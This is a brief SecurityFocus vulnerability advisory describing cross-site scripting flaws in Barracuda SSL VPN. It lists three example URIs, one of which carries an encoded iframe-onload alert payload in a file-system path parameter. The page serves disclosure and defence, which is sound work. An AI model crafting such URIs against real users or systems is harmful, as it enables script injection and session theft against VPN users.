Barracuda SSL VPN Multiple Cross Site Scripting Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.

The following example URIs are available:

https://www.example.com/resourceList.do?form=resourceCategoriesForm&readOnly=test&path=
%2FshowUserResourceCategories.do&messageResourcesKey=resourceCategory&actionPath=[XSS]

https://www.example.com/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing%20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

https://www.example.com/launchAgent.do?launchId=l3ce418&returnTo=[XSS]


 

Privacy Statement
Copyright 2010, SecurityFocus